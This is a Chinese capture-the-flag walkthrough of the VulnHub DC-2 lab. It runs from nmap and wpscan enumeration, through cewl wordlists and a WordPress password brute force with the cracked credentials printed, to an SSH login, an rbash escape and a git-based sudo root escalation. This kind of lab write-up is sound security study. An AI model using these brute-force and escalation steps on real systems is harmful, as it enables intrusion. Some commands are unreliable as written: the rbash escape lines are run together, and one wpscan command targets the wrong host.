VulnHub靶机 DC-2 打靶

一、将靶机导入到虚拟机当中

靶机地址：

https://www.vulnhub.com/entry/dc-2,311/

二、攻击方式

主机发现

使用arp-scan命令探测主机，或者使用nmap命令也可

端口扫描

nmap -p- 10.1.2.154

服务探针

开发80端口，访问一下web服务界面

爆破目录

dirsearch -u http://dc-2 -i 200

发现登录界面

web渗透

来到web界面首页得到flag提示信息

翻译：

你通常的词汇表可能不会起作用，所以，也许你只需要保持冷静(cewl)。
密码越多越好，但有时候你就是赢不了所有密码。
以一个登录查看下一个标志。
如果找不到，请以另一个身份登录。

信息收集

发现此web服务的一些信息和采用的CMS

发现网站采用WordPress CMS ，那么来到kali端使用wpscan工具进行对网站扫描

扫描探针

wpscan --url http://dc-2 -e u

得到三个登录用户，将其保存到记事本当中，跟前前面的flag提示，使用cewl命令针对网站来生成密码，并保存到记事本当中，后面进行爆破

Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外，Cewl还提供了命令行工具。

使用cewl命令行工具，对网站进行生成字典，保存到passwd.txt当中

cewl http://dc-2 -w passwd.txt

登录密码爆破

使用wpscan工具进行爆破

wpscan --url http://dc-3 -U user.txt -P passwd.txt 

开始爆破，成功爆破出Jerry和tom的密码，等了web后台

用户名：tom
密码：parturient用户名：jerry
密码：adipiscing

拿到用户名和密码登录网站后台，找到flag2

翻译：

如果您无法利用 WordPress 并走捷径，还有另一种方法。希望你找到了另一个切入点。

SSH远程登录

这里没有什么利用点。开始的端口扫描，发现此将ssh端口改为7744，那么我们尝试将上面得到的用户名和密码再次进行SSH远程登录尝试

ssh tom@10.1.2.154 -p 7744
ssh jerry@10.1.2.154 -p 7744

发现tom可以远程登录成功，发现当前目录下有flag3.txt

没有cat命令，可以尝试其他可以产看文件的命令

内容：

翻译：

可怜的老汤姆总是追着杰瑞跑。也许他应该为自己造成的压力承担责任。（su命令提示）

rbash

可看到出现su命令提示，我们尝试切换到Jerry用户,发现没有su ，我们需要rbash逃逸

BASH_CMDS[su]=/bin/shsuexport PATH=$PATH:/bin/export PATH=$PATH:/usr/bin/su jerry
输入jerry的密码，前面收集爆破到的密码

成功切换到jerry用户处，回到jerry的家目录，找到flag4.txt查看即可

翻译：

很高兴看到你已经走了这么远-但你还没回家。你仍然需要得到最后的旗帜(唯一真正重要的旗帜!!!)这里没有提示-你现在是在你自己。:-)
走吧-离开这里!!!!(git)

提权

使用git提权即可

sudo git branch --help config
!/bin/sh

well done!
恭喜你啊!!!

文章不妥之处，欢迎批评指正！